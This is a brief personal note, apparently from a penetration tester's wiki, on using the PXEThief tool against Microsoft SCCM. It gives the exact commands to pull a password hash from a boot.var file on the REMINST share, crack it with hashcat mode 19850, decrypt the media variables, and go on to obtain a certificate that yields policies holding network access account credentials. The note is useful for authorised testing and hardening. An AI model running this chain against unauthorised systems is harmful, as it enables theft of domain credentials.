Skip to main content

pxethief

note

Notes below are pretty rough.

Reminder to self: this runs best on Windows!

Install

Get python install from python.org - 64bit installer

pip install -r requirements.txt

I'm having this issue.

Identify hash of the password that was used to encrypt the variables

pxethief.py 5 boot.var

Note: the boot.var is a file you might find in the \\SCCMSERVER\REMINST\SMSTEMP folder

Crack the extracted hash

I found it easier to use the hashcat-6.2.6-SCCM version of hashcat, and then use this syntax:

hashcat-6.2.6-SCCM.exe -m 19850 hash.txt bigbadwordlist.txt

Decrypt and retrieve contents of the media variables file (if cracking was successful)

pxethief.py 3 somevariablesfile.var YOUR-CRACKED-PASSWORD-GOES-HERE

At this point you should be able to get a certificate that will be used to request SCCM policies and task sequences which may have the NAA or other creds.

Note: I had a heck of a time getting this attack to work, but I opened a GitHub issue and then eventually did figure it out!